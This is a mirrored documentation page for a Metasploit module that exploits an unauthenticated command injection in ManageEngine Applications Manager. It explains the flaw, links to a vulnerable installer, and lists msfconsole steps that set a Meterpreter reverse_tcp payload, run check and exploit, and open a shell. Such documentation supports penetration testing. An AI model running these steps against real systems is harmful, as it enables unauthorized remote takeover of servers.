CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md
Views: 1904
Vulnerable Application
This module exploits command injection vulnerability in the ManageEngine Applications Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer.
Vulnerable Application Installation Steps
Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else. http://archives.manageengine.com/applications_manager/13630/
Verification Steps
A successful check of the exploit will look like this:
Start
msfconsoleuse exploit/windows/http/manageengine_appmanager_execSet
RHOST <RHOST>Set
PAYLOAD windows/meterpreter/reverse_tcpSet
LHOST <LHOST>Run
checkVerify that you are seeing
The target is vulnerable.in console.Run
exploitVerify that you are seeing
Triggering the vulnerabilityin console.Verify that you are seeing
Sending stage to <TARGET>in console.Verify that you have your shell.